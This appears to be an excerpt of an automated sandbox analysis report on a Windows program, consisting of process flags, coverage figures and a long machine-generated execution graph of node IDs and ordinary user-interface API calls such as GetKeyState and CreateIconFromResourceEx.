                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.5%
                                                                                    Total number of Nodes:1060
                                                                                    Total number of Limit Nodes:84
                                                                                    execution_graph 79552 c040d46 79553 c040d59 79552->79553 79558 58b84c8 79553->79558 79564 58b75fc 79553->79564 79570 58b8562 79553->79570 79554 c04103e 79559 58b84cb 79558->79559 79561 58b8455 79558->79561 79559->79561 79577 c046b50 79559->79577 79581 c046b40 79559->79581 79560 58b850f 79560->79554 79561->79554 79565 58b7607 79564->79565 79566 58b8545 79565->79566 79568 c046b40 7 API calls 79565->79568 79569 c046b50 7 API calls 79565->79569 79566->79554 79567 58b850f 79567->79554 79568->79567 79569->79567 79571 58b856b 79570->79571 79572 58b84f5 79570->79572 79571->79554 79573 58b8545 79572->79573 79575 c046b40 7 API calls 79572->79575 79576 c046b50 7 API calls 79572->79576 79573->79554 79574 58b850f 79574->79554 79575->79574 79576->79574 79578 c046b70 79577->79578 79580 58bbdc0 7 API calls 79578->79580 79579 c046bca 79579->79560 79580->79579 79582 c046b49 79581->79582 79584 58bbdc0 7 API calls 79582->79584 79583 c046bca 79583->79560 79584->79583 79585 58b76c8 79586 58b76e0 79585->79586 79599 58b740c 79586->79599 79588 58b7739 79606 58b741c 79588->79606 79590 58b775d 79611 58b742c 79590->79611 79592 58b777b 79596 58b7b18 79592->79596 79597 1b08430 14 API calls 79592->79597 79598 1b05c7c 14 API calls 79592->79598 79593 58b81e6 79594 58b75fc 7 API calls 79593->79594 79595 58b8211 79594->79595 79597->79593 79598->79593 79600 58b7417 79599->79600 79604 1b08430 14 API calls 79600->79604 79605 1b05c7c 14 API calls 79600->79605 79601 58b81e6 79602 58b75fc 7 API calls 79601->79602 79603 58b8211 79602->79603 79603->79588 79604->79601 79605->79601 79608 58b7427 79606->79608 79607 58b862e 79607->79590 79608->79607 79615 58b763c 79608->79615 79610 58b868e 79610->79590 79612 58b7437 79611->79612 79613 58b763c 14 API calls 79612->79613 79614 58b868e 79613->79614 79614->79592 79616 58b7647 79615->79616 79620 1b05c4c 79616->79620 79624 1b07250 79616->79624 79617 58b8c84 79617->79610 79621 1b05c57 79620->79621 79622 1b05c7c 14 API calls 79621->79622 79623 1b07305 79622->79623 79623->79617 79625 1b07260 79624->79625 79626 1b05c7c 14 API calls 79625->79626 79627 1b07305 79626->79627 79627->79617 79063 c041f00 79067 c041f20 79063->79067 79072 c041f30 79063->79072 79064 c041f1f 79068 c041f2d 79067->79068 79070 c041f52 79068->79070 79076 1b08430 79068->79076 79085 1b05c7c 79068->79085 79070->79064 79073 c041f52 79072->79073 79074 1b08430 14 API calls 79072->79074 79075 1b05c7c 14 API calls 79072->79075 79073->79064 79074->79073 79075->79073 79077 1b08440 79076->79077 79079 1b086f3 79077->79079 79094 1b0aaa8 79077->79094 79098 1b0aa99 79077->79098 79102 1b0ada0 79077->79102 79078 1b08731 79078->79070 79079->79078 79106 1b0ce8f 79079->79106 79111 1b0ce81 79079->79111 79086 1b05c87 79085->79086 79088 1b086f3 79086->79088 79089 1b0ada0 3 API calls 79086->79089 79090 1b0aaa8 2 API calls 79086->79090 79091 1b0aa99 2 API calls 79086->79091 79087 1b08731 79087->79070 79088->79087 79092 1b0ce81 14 API calls 79088->79092 79093 1b0ce8f 14 API calls 79088->79093 79089->79088 79090->79088 79091->79088 79092->79087 79093->79087 79095 1b0aac3 79094->79095 79097 1b0acf8 79095->79097 79116 1b0a6d4 79095->79116 79097->79079 79100 1b0aac3 79098->79100 79099 1b0a6d4 2 API calls 79101 1b0acf8 79099->79101 79100->79099 79100->79101 79101->79079 79129 1b0adc9 79102->79129 79134 1b0add8 79102->79134 79103 1b0adb6 79103->79079 79107 1b0ceb1 79106->79107 79108 1b0ced5 79107->79108 79157 1b0d030 79107->79157 79161 1b0d040 79107->79161 79108->79078 79112 1b0cea6 79111->79112 79113 1b0ced5 79112->79113 79114 1b0d030 14 API calls 79112->79114 79115 1b0d040 14 API calls 79112->79115 79113->79078 79114->79113 79115->79113 79117 1b0a6df 79116->79117 79118 1b0fddd 79117->79118 79121 c044828 79117->79121 79125 c044818 79117->79125 79118->79097 79122 c04486b 79121->79122 79123 c0448ba 79122->79123 79124 c044889 MonitorFromPoint 79122->79124 79123->79118 79124->79123 79126 c04486b 79125->79126 79127 c044889 MonitorFromPoint 79126->79127 79128 c0448ba 79126->79128 79127->79128 79128->79118 79130 1b0add8 79129->79130 79138 1b0aebf 79130->79138 79145 1b0aed0 79130->79145 79131 1b0ade7 79131->79103 79136 1b0aed0 2 API calls 79134->79136 79137 1b0aebf 2 API calls 79134->79137 79135 1b0ade7 79135->79103 79136->79135 79137->79135 79139 1b0aee1 79138->79139 79140 1b0af04 79138->79140 79139->79140 79143 1b0aefc 79139->79143 79152 1b0b159 79139->79152 79140->79131 79141 1b0b108 GetModuleHandleW 79142 1b0b135 79141->79142 79142->79131 79143->79140 79143->79141 79146 1b0aee1 79145->79146 79147 1b0af04 79145->79147 79146->79147 79148 1b0aefc 79146->79148 79151 1b0b159 GetModuleHandleW 79146->79151 79147->79131 79148->79147 79149 1b0b108 GetModuleHandleW 79148->79149 79150 1b0b135 79149->79150 79150->79131 79151->79148 79153 1b0b102 GetModuleHandleW 79152->79153 79156 1b0b162 79152->79156 79155 1b0b135 79153->79155 79155->79143 79156->79143 79158 1b0d04d 79157->79158 79159 1b0d087 79158->79159 79165 1b0c978 79158->79165 79159->79108 79163 1b0d04d 79161->79163 79162 1b0d087 79162->79108 79163->79162 79164 1b0c978 14 API calls 79163->79164 79164->79162 79166 1b0c983 79165->79166 79168 1b0d998 79166->79168 79181 1b0caa4 79166->79181 79169 1b05c7c 14 API calls 79168->79169 79170 1b0da07 79169->79170 79171 1b0da16 79170->79171 79195 1b0de80 79170->79195 79204 1b0de88 79170->79204 79213 1b0cab4 79171->79213 79173 1b0da30 79218 1b0cac4 79173->79218 79175 1b0da37 79222 1b0f768 79175->79222 79227 1b0f780 79175->79227 79176 1b0da41 79176->79159 79182 1b0caaf 79181->79182 79183 1b05c7c 14 API calls 79182->79183 79184 1b0da07 79183->79184 79185 1b0da16 79184->79185 79191 1b0de80 8 API calls 79184->79191 79192 1b0de88 8 API calls 79184->79192 79186 1b0cab4 6 API calls 79185->79186 79187 1b0da30 79186->79187 79188 1b0cac4 6 API calls 79187->79188 79189 1b0da37 79188->79189 79193 1b0f780 6 API calls 79189->79193 79194 1b0f768 6 API calls 79189->79194 79190 1b0da41 79190->79168 79191->79185 79192->79185 79193->79190 79194->79190 79196 1b0deb6 79195->79196 79197 1b0dedf 79196->79197 79203 1b0dff3 79196->79203 79232 1b0dae0 GetFocus 79196->79232 79199 1b0df87 79197->79199 79201 1b0def7 79197->79201 79200 1b0cac4 6 API calls 79199->79200 79199->79203 79200->79203 79202 1b0df82 KiUserCallbackDispatcher 79201->79202 79201->79203 79202->79203 79205 1b0deb6 79204->79205 79206 1b0dedf 79205->79206 79212 1b0dff3 79205->79212 79233 1b0dae0 GetFocus 79205->79233 79208 1b0df87 79206->79208 79210 1b0def7 79206->79210 79209 1b0cac4 6 API calls 79208->79209 79208->79212 79209->79212 79211 1b0df82 KiUserCallbackDispatcher 79210->79211 79210->79212 79211->79212 79216 1b0cabf 79213->79216 79215 1b0efa4 79215->79173 79217 1b0efa9 79216->79217 79234 1b0dcf4 79216->79234 79217->79173 79219 1b0cacf 79218->79219 79238 1b0dde8 79219->79238 79221 1b0f5af 79221->79175 79223 1b0f745 79222->79223 79223->79222 79224 1b0f7bd 79223->79224 79245 c042c08 79223->79245 79249 c042bf8 79223->79249 79224->79176 79228 1b0f7b1 79227->79228 79229 1b0f7bd 79227->79229 79228->79229 79230 c042c08 6 API calls 79228->79230 79231 c042bf8 6 API calls 79228->79231 79229->79176 79230->79229 79231->79229 79232->79197 79233->79206 79235 1b0dcff 79234->79235 79236 1b0cac4 6 API calls 79235->79236 79237 1b0f0d5 79235->79237 79236->79237 79237->79215 79239 1b0ddf3 79238->79239 79240 1b0f721 79239->79240 79241 1b0f682 79239->79241 79243 1b0f780 6 API calls 79239->79243 79244 1b0f768 6 API calls 79239->79244 79240->79221 79241->79240 79242 1b0dde8 6 API calls 79241->79242 79242->79241 79243->79241 79244->79241 79246 c042c16 79245->79246 79247 c042c2d 79246->79247 79253 58b45a0 79246->79253 79247->79224 79251 c042c08 79249->79251 79250 c042c2d 79250->79224 79251->79250 79252 58b45a0 6 API calls 79251->79252 79252->79250 79254 58b45b0 79253->79254 79255 58b45ed 79254->79255 79256 1b0f780 6 API calls 79254->79256 79259 1b0f768 6 API calls 79254->79259 79260 c04c7e0 79254->79260 79281 c04c7f0 79254->79281 79255->79247 79256->79255 79259->79255 79261 c04c7ed 79260->79261 79262 c04c8c7 79261->79262 79267 1b0f780 6 API calls 79261->79267 79268 1b0f768 6 API calls 79261->79268 79278 c04c93d 79262->79278 79302 7ce24ab 79262->79302 79311 7ce24b3 79262->79311 79319 7ce0348 79262->79319 79263 c04ca7f 79264 c04cab0 79263->79264 79271 1b0dcf4 6 API calls 79263->79271 79343 1b0f03a 79263->79343 79347 7ce23c8 79264->79347 79351 7ce23d8 79264->79351 79265 c04cac4 79266 c04c945 79266->79263 79335 c0450b0 79266->79335 79339 c0450a0 79266->79339 79267->79262 79268->79262 79271->79264 79327 7ce0358 79278->79327 79331 7ce23f3 79278->79331 79282 c04c829 79281->79282 79283 c04c8c7 79282->79283 79288 1b0f780 6 API calls 79282->79288 79289 1b0f768 6 API calls 79282->79289 79296 7ce24ab 2 API calls 79283->79296 79297 7ce0348 2 API calls 79283->79297 79298 7ce24b3 2 API calls 79283->79298 79299 c04c93d 79283->79299 79284 c04c945 79285 c04ca7f 79284->79285 79300 c0450a0 KiUserCallbackDispatcher 79284->79300 79301 c0450b0 KiUserCallbackDispatcher 79284->79301 79286 c04cab0 79285->79286 79292 1b0dcf4 6 API calls 79285->79292 79293 1b0f03a 6 API calls 79285->79293 79294 7ce23c8 KiUserCallbackDispatcher 79286->79294 79295 7ce23d8 KiUserCallbackDispatcher 79286->79295 79287 c04cac4 79288->79283 79289->79283 79290 7ce0358 KiUserCallbackDispatcher 79290->79284 79291 7ce23f3 KiUserCallbackDispatcher 79291->79284 79292->79286 79293->79286 79294->79287 79295->79287 79296->79299 79297->79299 79298->79299 79299->79290 79299->79291 79300->79285 79301->79285 79303 7ce24b2 79302->79303 79304 7ce2513 79302->79304 79303->79278 79306 7ce2546 79304->79306 79309 c04dab0 PostMessageW PostMessageW 79304->79309 79310 c04dac0 PostMessageW PostMessageW 79304->79310 79305 7ce25e7 79307 c04dab0 PostMessageW PostMessageW 79305->79307 79308 c04dac0 PostMessageW PostMessageW 79305->79308 79306->79278 79307->79306 79308->79306 79309->79305 79310->79305 79312 7ce24b8 79311->79312 79314 7ce2546 79312->79314 79317 c04dab0 PostMessageW PostMessageW 79312->79317 79318 c04dac0 PostMessageW PostMessageW 79312->79318 79313 7ce25e7 79315 c04dab0 PostMessageW PostMessageW 79313->79315 79316 c04dac0 PostMessageW PostMessageW 79313->79316 79314->79278 79315->79314 79316->79314 79317->79313 79318->79313 79320 7ce0353 79319->79320 79322 7ce2546 79320->79322 79323 c04dab0 PostMessageW PostMessageW 79320->79323 79324 c04dac0 PostMessageW PostMessageW 79320->79324 79321 7ce25e7 79325 c04dab0 PostMessageW PostMessageW 79321->79325 79326 c04dac0 PostMessageW PostMessageW 79321->79326 79322->79278 79323->79321 79324->79321 79325->79322 79326->79322 79328 7ce0363 79327->79328 79329 7ce2430 79328->79329 79330 7ce241c KiUserCallbackDispatcher 79328->79330 79329->79266 79330->79329 79332 7ce2400 79331->79332 79333 7ce2430 79332->79333 79334 7ce241c KiUserCallbackDispatcher 79332->79334 79333->79266 79334->79333 79336 c0450c3 79335->79336 79337 c0450c7 79336->79337 79338 c04511a KiUserCallbackDispatcher 79336->79338 79337->79263 79338->79337 79340 c0450c3 79339->79340 79341 c0450c7 79340->79341 79342 c04511a KiUserCallbackDispatcher 79340->79342 79341->79263 79342->79341 79344 1b0f040 79343->79344 79345 1b0cac4 6 API calls 79344->79345 79346 1b0f0d5 79344->79346 79345->79346 79346->79264 79348 7ce23e5 79347->79348 79349 7ce0358 KiUserCallbackDispatcher 79348->79349 79350 7ce23ec 79349->79350 79350->79265 79352 7ce23e5 79351->79352 79353 7ce0358 KiUserCallbackDispatcher 79352->79353 79354 7ce23ec 79353->79354 79354->79265 79628 c040040 79629 c040078 79628->79629 79633 c0416c0 79629->79633 79637 c0416b0 79629->79637 79630 c040173 79635 1b08430 14 API calls 79633->79635 79636 1b05c7c 14 API calls 79633->79636 79634 c0416d3 79634->79630 79635->79634 79636->79634 79638 c0416c0 79637->79638 79640 1b08430 14 API calls 79638->79640 79641 1b05c7c 14 API calls 79638->79641 79639 c0416d3 79639->79630 79640->79639 79641->79639 80213 c0431c0 80214 c043205 GetClassInfoW 80213->80214 80216 c04324b 80214->80216 79355 58ba180 79359 58ba19a 79355->79359 79364 58ba1a8 79355->79364 79356 58ba196 79360 58ba1d1 79359->79360 79361 58ba2d6 79360->79361 79369 58ba660 79360->79369 79374 58ba652 79360->79374 79361->79356 79365 58ba1d1 79364->79365 79366 58ba2d6 79365->79366 79367 58ba652 7 API calls 79365->79367 79368 58ba660 7 API calls 79365->79368 79366->79356 79367->79366 79368->79366 79370 58ba684 79369->79370 79371 58ba75a 79370->79371 79379 58bac78 79370->79379 79385 58bac88 79370->79385 79371->79361 79376 58ba684 79374->79376 79375 58ba75a 79375->79361 79376->79375 79377 58bac88 7 API calls 79376->79377 79378 58bac78 7 API calls 79376->79378 79377->79375 79378->79375 79380 58bac88 79379->79380 79381 58baca3 79380->79381 79390 58bacb8 79380->79390 79394 58bae53 79380->79394 79398 58bacaa 79380->79398 79381->79371 79386 58baca3 79385->79386 79387 58bacaa 7 API calls 79385->79387 79388 58bacb8 7 API calls 79385->79388 79389 58bae53 7 API calls 79385->79389 79386->79371 79387->79386 79388->79386 79389->79386 79392 58bacf2 79390->79392 79402 58bbdc0 79392->79402 79395 58bae19 79394->79395 79397 58bbdc0 7 API calls 79395->79397 79396 58bae40 79396->79381 79397->79396 79399 58bacf2 79398->79399 79401 58bbdc0 7 API calls 79399->79401 79400 58bae40 79400->79381 79401->79400 79404 58bbdc8 79402->79404 79403 58bbe9e 79404->79403 79405 58b45a0 6 API calls 79404->79405 79406 58bbf29 KiUserCallbackDispatcher 79405->79406 79406->79403 79407 c04c208 79408 c04c256 EnumThreadWindows 79407->79408 79409 c04c24c 79407->79409 79410 c04c288 79408->79410 79409->79408 79712 7ce2640 79713 7ce267a 79712->79713 79714 7ce270b 79713->79714 79715 7ce26f6 79713->79715 79717 7ce03c8 3 API calls 79714->79717 79720 7ce03c8 79715->79720 79719 7ce271a 79717->79719 79722 7ce03d3 79720->79722 79721 7ce2701 79722->79721 79725 7ce3100 79722->79725 79731 7ce30f0 79722->79731 79738 7ce041c 79725->79738 79728 7ce3127 79728->79721 79729 7ce3150 CreateIconFromResourceEx 79730 7ce31ce 79729->79730 79730->79721 79732 7ce3100 79731->79732 79733 7ce041c CreateIconFromResourceEx 79732->79733 79734 7ce311a 79733->79734 79735 7ce3127 79734->79735 79736 7ce3150 CreateIconFromResourceEx 79734->79736 79735->79721 79737 7ce31ce 79736->79737 79737->79721 79739 7ce3150 CreateIconFromResourceEx 79738->79739 79740 7ce311a 79739->79740 79740->79728 79740->79729 79411 1b0d3a0 DuplicateHandle 79412 1b0d436 79411->79412 79642 79d1bc8 79643 79d1c22 79642->79643 79644 79d1ca7 GetCurrentThreadId 79643->79644 79645 79d1cd7 79643->79645 79644->79645 79741 ccd3f58 79742 ccd3f6c 79741->79742 79743 ccd3f7d 79742->79743 79747 c04d488 79742->79747 79753 c04d479 79742->79753 79744 ccd3fa0 79748 c04d4ce 79747->79748 79749 c04d4f1 79748->79749 79759 58b0bfc 79748->79759 79766 58b42b0 79748->79766 79773 58b0bcf 79748->79773 79749->79744 79754 c04d481 79753->79754 79755 c04d4f1 79754->79755 79756 58b0bcf 11 API calls 79754->79756 79757 58b0bfc 11 API calls 79754->79757 79758 58b42b0 11 API calls 79754->79758 79755->79744 79756->79755 79757->79755 79758->79755 79760 58b0c07 79759->79760 79761 58b43ac 79760->79761 79762 58b4302 79760->79762 79781 58b0ad4 79761->79781 79763 58b435a CallWindowProcW 79762->79763 79765 58b4309 79762->79765 79763->79765 79765->79749 79767 58b42c0 79766->79767 79768 58b43ac 79767->79768 79769 58b4302 79767->79769 79771 58b0ad4 10 API calls 79768->79771 79770 58b435a CallWindowProcW 79769->79770 79772 58b4309 79769->79772 79770->79772 79771->79772 79772->79749 79775 58b0be5 79773->79775 79774 58b0b9c 79775->79774 79776 58b43ac 79775->79776 79777 58b4302 79775->79777 79779 58b0ad4 10 API calls 79776->79779 79778 58b435a CallWindowProcW 79777->79778 79780 58b4309 79777->79780 79778->79780 79779->79780 79780->79749 79782 58b0adf 79781->79782 79783 58b2c79 79782->79783 79785 58b2c69 79782->79785 79784 58b0bfc 11 API calls 79783->79784 79786 58b2c77 79784->79786 79790 58b2e6c 79785->79790 79796 58b2d91 79785->79796 79801 58b2da0 79785->79801 79791 58b2e2a 79790->79791 79792 58b2e7a 79790->79792 79806 58b2e58 79791->79806 79819 58b2e48 79791->79819 79793 58b2e40 79793->79786 79797 58b2db4 79796->79797 79799 58b2e48 11 API calls 79797->79799 79800 58b2e58 11 API calls 79797->79800 79798 58b2e40 79798->79786 79799->79798 79800->79798 79803 58b2db4 79801->79803 79802 58b2e40 79802->79786 79804 58b2e48 11 API calls 79803->79804 79805 58b2e58 11 API calls 79803->79805 79804->79802 79805->79802 79807 58b2e69 79806->79807 79832 58b3688 79806->79832 79843 c043288 79806->79843 79850 58b4292 79806->79850 79853 c043278 79806->79853 79859 79d0e28 79806->79859 79865 c04cee1 79806->79865 79896 c042fa0 79806->79896 79900 c042fb0 79806->79900 79904 79d0e19 79806->79904 79910 c04cef0 79806->79910 79941 58b367a 79806->79941 79807->79793 79820 58b2e69 79819->79820 79821 58b367a 11 API calls 79819->79821 79822 58b3688 11 API calls 79819->79822 79823 79d0e19 11 API calls 79819->79823 79824 c04cef0 11 API calls 79819->79824 79825 c042fa0 11 API calls 79819->79825 79826 c042fb0 11 API calls 79819->79826 79827 79d0e28 11 API calls 79819->79827 79828 c04cee1 11 API calls 79819->79828 79829 58b4292 11 API calls 79819->79829 79830 c043278 11 API calls 79819->79830 79831 c043288 11 API calls 79819->79831 79820->79793 79821->79820 79822->79820 79823->79820 79824->79820 79825->79820 79826->79820 79827->79820 79828->79820 79829->79820 79830->79820 79831->79820 79834 58b36d4 79832->79834 79833 58b3974 79833->79807 79834->79833 79835 58b3fb4 GetKeyState 79834->79835 79840 58b4082 79834->79840 79836 58b3fe0 GetKeyState 79835->79836 79838 58b4033 GetFocus 79836->79838 79838->79840 79840->79833 79841 c04d488 8 API calls 79840->79841 79842 c04d479 8 API calls 79840->79842 79841->79833 79842->79833 79844 c043309 79843->79844 79846 c0432aa 79843->79846 79845 c043310 79844->79845 79847 58b367a 11 API calls 79844->79847 79848 58b3688 11 API calls 79844->79848 79849 58b4292 11 API calls 79844->79849 79845->79807 79846->79807 79847->79845 79848->79845 79849->79845 79851 58b0bfc 11 API calls 79850->79851 79852 58b42aa 79851->79852 79852->79807 79854 c043288 79853->79854 79855 c0432aa 79854->79855 79856 58b367a 11 API calls 79854->79856 79857 58b3688 11 API calls 79854->79857 79858 58b4292 11 API calls 79854->79858 79855->79807 79856->79855 79857->79855 79858->79855 79860 79d0e68 79859->79860 79861 79d0e36 79859->79861 79860->79807 79862 79d0e3d 79861->79862 79952 79d0e90 79861->79952 79958 79d0e80 79861->79958 79862->79807 79866 c04cee9 79865->79866 79867 c04cf50 79866->79867 79868 c04cf0e 79866->79868 79877 c04cfa0 79866->79877 79871 c04cf1c 79867->79871 79875 c04cf61 79867->79875 79876 c04d1da 79867->79876 79869 c04cf13 79868->79869 79870 c04cf2a 79868->79870 79869->79871 79872 c04d139 79869->79872 79873 c04d0b0 79870->79873 79874 c04cf33 79870->79874 79885 c043020 11 API calls 79871->79885 79890 c04d09d 79871->79890 79978 c04b3d8 79872->79978 79974 c04b388 79873->79974 79874->79871 79881 c04d227 79874->79881 79882 c04d1e8 79874->79882 79883 c04d209 79874->79883 79884 c04cf42 79874->79884 79887 c04d147 79874->79887 79874->79890 79895 c04d056 79874->79895 79875->79871 79875->79881 79875->79882 79875->79883 79875->79890 79875->79895 79982 c04cadc 79876->79982 79877->79871 79877->79881 79877->79882 79877->79883 79886 c043020 11 API calls 79881->79886 79891 c043020 11 API calls 79882->79891 79892 c043020 11 API calls 79883->79892 79884->79871 79888 c04d1cc 79884->79888 79885->79890 79886->79890 79893 c043020 11 API calls 79887->79893 79986 c04b478 11 API calls 79888->79986 79890->79807 79891->79890 79892->79890 79893->79890 79964 c043020 79895->79964 79897 c042fb0 79896->79897 79898 c042fc9 79897->79898 79899 c043020 11 API calls 79897->79899 79898->79807 79899->79898 79901 c042fbf 79900->79901 79902 c042fc9 79900->79902 79903 c043020 11 API calls 79901->79903 79902->79807 79903->79902 79905 79d0e36 79904->79905 79906 79d0e68 79904->79906 79907 79d0e3d 79905->79907 79908 79d0e90 11 API calls 79905->79908 79909 79d0e80 11 API calls 79905->79909 79906->79807 79907->79807 79908->79907 79909->79907 79911 c04cf09 79910->79911 79922 c04cfa0 79910->79922 79912 c04cf50 79911->79912 79913 c04cf0e 79911->79913 79916 c04cf1c 79912->79916 79920 c04cf61 79912->79920 79921 c04d1da 79912->79921 79914 c04cf13 79913->79914 79915 c04cf2a 79913->79915 79914->79916 79917 c04d139 79914->79917 79918 c04d0b0 79915->79918 79919 c04cf33 79915->79919 79930 c043020 11 API calls 79916->79930 79935 c04d09d 79916->79935 79923 c04b3d8 11 API calls 79917->79923 79925 c04b388 2 API calls 79918->79925 79919->79916 79926 c04d227 79919->79926 79927 c04d1e8 79919->79927 79928 c04d209 79919->79928 79929 c04cf42 79919->79929 79932 c04d147 79919->79932 79919->79935 79940 c04d056 79919->79940 79920->79916 79920->79926 79920->79927 79920->79928 79920->79935 79920->79940 79924 c04cadc 11 API calls 79921->79924 79922->79916 79922->79926 79922->79927 79922->79928 79923->79935 79924->79935 79925->79935 79931 c043020 11 API calls 79926->79931 79936 c043020 11 API calls 79927->79936 79937 c043020 11 API calls 79928->79937 79929->79916 79933 c04d1cc 79929->79933 79930->79935 79931->79935 79938 c043020 11 API calls 79932->79938 80041 c04b478 11 API calls 79933->80041 79935->79807 79936->79935 79937->79935 79938->79935 79939 c043020 11 API calls 79939->79935 79940->79939 79943 58b36d4 79941->79943 79942 58b3974 79942->79807 79943->79942 79944 58b3fb4 GetKeyState 79943->79944 79949 58b4082 79943->79949 79945 58b3fe0 GetKeyState 79944->79945 79947 58b4033 GetFocus 79945->79947 79947->79949 79949->79942 79950 c04d488 8 API calls 79949->79950 79951 c04d479 8 API calls 79949->79951 79950->79942 79951->79942 79953 79d0eb6 79952->79953 79954 79d0eeb 79952->79954 79953->79862 79954->79953 79955 58b367a 11 API calls 79954->79955 79956 58b3688 11 API calls 79954->79956 79957 58b4292 11 API calls 79954->79957 79955->79953 79956->79953 79957->79953 79960 79d0e89 79958->79960 79959 79d0eb6 79959->79862 79960->79959 79961 58b367a 11 API calls 79960->79961 79962 58b3688 11 API calls 79960->79962 79963 58b4292 11 API calls 79960->79963 79961->79959 79962->79959 79963->79959 79965 c043032 79964->79965 79966 c04302b 79964->79966 80018 c043041 79965->80018 80024 c043050 79965->80024 79987 c04f560 79966->79987 80000 c04f4ef 79966->80000 80013 c04f67a 79966->80013 79967 c043030 79967->79890 79968 c043038 79968->79890 79975 c04b393 79974->79975 80037 c04cc38 79975->80037 79977 c04e4f2 79977->79890 79979 c04b3e3 79978->79979 79980 c043020 11 API calls 79979->79980 79981 c04d5fe 79980->79981 79981->79890 79983 c04cae7 79982->79983 79984 c043020 11 API calls 79983->79984 79985 c04fd39 79984->79985 79985->79890 79986->79890 79988 c04f58b 79987->79988 79989 c04f695 79988->79989 79990 c04f59b 79988->79990 79991 c043050 11 API calls 79989->79991 79995 c04f5a7 79990->79995 79998 c04f5e3 79990->79998 79992 c04f6a0 79991->79992 79992->79967 79993 c043050 11 API calls 79994 c04f68e 79993->79994 79994->79967 80031 c04cc88 79995->80031 79997 c04f5dc 79997->79967 79998->79993 79999 c04f673 79998->79999 79999->79967 80001 c04f4f9 80000->80001 80002 c04f695 80001->80002 80003 c04f59b 80001->80003 80004 c043050 11 API calls 80002->80004 80008 c04f5a7 80003->80008 80011 c04f5e3 80003->80011 80005 c04f6a0 80004->80005 80005->79967 80006 c043050 11 API calls 80007 c04f68e 80006->80007 80007->79967 80009 c04cc88 2 API calls 80008->80009 80010 c04f5dc 80009->80010 80010->79967 80011->80006 80012 c04f673 80011->80012 80012->79967 80014 c04f66d 80013->80014 80015 c04f673 80014->80015 80016 c043050 11 API calls 80014->80016 80015->79967 80017 c04f68e 80016->80017 80017->79967 80019 c043050 80018->80019 80020 c04306c 80019->80020 80021 58b3688 11 API calls 80019->80021 80022 58b4292 11 API calls 80019->80022 80023 58b367a 11 API calls 80019->80023 80020->79968 80021->80020 80022->80020 80023->80020 80025 c04305e 80024->80025 80027 c043080 80024->80027 80026 c04306c 80025->80026 80028 58b3688 11 API calls 80025->80028 80029 58b4292 11 API calls 80025->80029 80030 58b367a 11 API calls 80025->80030 80026->79968 80027->79968 80028->80026 80029->80026 80030->80026 80032 c04cc93 80031->80032 80033 c04ef71 GetFocus 80032->80033 80034 c04efde 80032->80034 80035 c04ef99 80033->80035 80034->79997 80035->80034 80036 c04efdc KiUserCallbackDispatcher 80035->80036 80036->80034 80039 c04cc43 80037->80039 80038 c04e57e 80038->79977 80039->80038 80040 c04cc88 2 API calls 80039->80040 80040->80038 80041->79935 80042 79d0808 80043 79d082b 80042->80043 80045 c043020 11 API calls 80043->80045 80044 79d0834 80045->80044 80217 1b04668 80218 1b04672 80217->80218 80222 1b04758 80217->80222 80227 1b03e1c 80218->80227 80220 1b0468d 80223 1b0475d 80222->80223 80231 1b04868 80223->80231 80235 1b04858 80223->80235 80228 1b03e27 80227->80228 80243 1b05bfc 80228->80243 80230 1b06f90 80230->80220 80233 1b0488f 80231->80233 80232 1b0496c 80232->80232 80233->80232 80239 1b0449c 80233->80239 80236 1b0488f 80235->80236 80237 1b0449c CreateActCtxA 80236->80237 80238 1b0496c 80236->80238 80237->80238 80240 1b058f8 CreateActCtxA 80239->80240 80242 1b059bb 80240->80242 80244 1b05c07 80243->80244 80247 1b05c1c 80244->80247 80246 1b0712d 80246->80230 80248 1b05c27 80247->80248 80249 1b05c4c 14 API calls 80248->80249 80250 1b07202 80249->80250 80250->80246 79646 ccd7c90 79647 ccd7ca4 79646->79647 79653 ccd7dc9 79647->79653 79656 ccd7de8 79647->79656 79659 ccd8228 79647->79659 79662 ccd8238 79647->79662 79648 ccd7d76 79665 ccd7e40 79653->79665 79654 ccd7df6 79654->79648 79657 ccd7df6 79656->79657 79658 ccd7e40 6 API calls 79656->79658 79657->79648 79658->79657 79660 ccd7e40 6 API calls 79659->79660 79661 ccd8245 79660->79661 79661->79648 79663 ccd7e40 6 API calls 79662->79663 79664 ccd8245 79662->79664 79663->79664 79664->79648 79666 ccd7e62 79665->79666 79670 58b6278 79666->79670 79674 58b6268 79666->79674 79667 ccd7ec0 79667->79654 79671 58b6295 79670->79671 79673 58b62ab 79670->79673 79672 58b45a0 6 API calls 79671->79672 79671->79673 79672->79673 79673->79667 79675 58b6278 79674->79675 79676 58b45a0 6 API calls 79675->79676 79677 58b62ab 79675->79677 79676->79677 79677->79667 79678 ccd4e90 79690 ccd4610 GetKeyState 79678->79690 79680 ccd4ebe 79682 ccd4610 5 API calls 79680->79682 79684 ccd4ed3 79680->79684 79683 ccd4f01 79682->79683 79685 ccd4f05 79683->79685 79686 ccd4610 5 API calls 79683->79686 79687 ccd4f26 79686->79687 79691 ccd4670 GetKeyState 79690->79691 79695 ccd46b5 GetKeyState 79691->79695 79694 ccd46fa GetKeyState 79698 ccd473f GetKeyState 79694->79698 79695->79694 79699 ccd4784 79698->79699 79699->79680 79700 ccd4f88 79699->79700 79704 ccd4f90 79699->79704 79701 ccd4f9e 79700->79701 79702 ccd4fa9 KiUserCallbackDispatcher 79701->79702 79703 ccd4fb2 79701->79703 79702->79703 79703->79680 79705 ccd4f9e 79704->79705 79706 ccd4fa9 KiUserCallbackDispatcher 79705->79706 79707 ccd4fb2 79705->79707 79706->79707 79707->79680 80046 181d01c 80047 181d034 80046->80047 80048 181d08e 80047->80048 80052 58b0ad4 11 API calls 80047->80052 80053 58b1e98 80047->80053 80057 58b1ea8 80047->80057 80061 58b2c08 80047->80061 80052->80048 80054 58b1ece 80053->80054 80055 58b0ad4 11 API calls 80054->80055 80056 58b1eef 80055->80056 80056->80048 80058 58b1ece 80057->80058 80059 58b0ad4 11 API calls 80058->80059 80060 58b1eef 80059->80060 80060->80048 80065 58b2c45 80061->80065 80062 58b2c79 80063 58b0bfc 11 API calls 80062->80063 80064 58b2c77 80063->80064 80065->80062 80066 58b2c69 80065->80066 80067 58b2e6c 11 API calls 80066->80067 80068 58b2d91 11 API calls 80066->80068 80069 58b2da0 11 API calls 80066->80069 80067->80064 80068->80064 80069->80064 80070 ccdb850 80071 ccdb876 80070->80071 80072 ccdb9db 80070->80072 80071->80072 80075 c04daf1 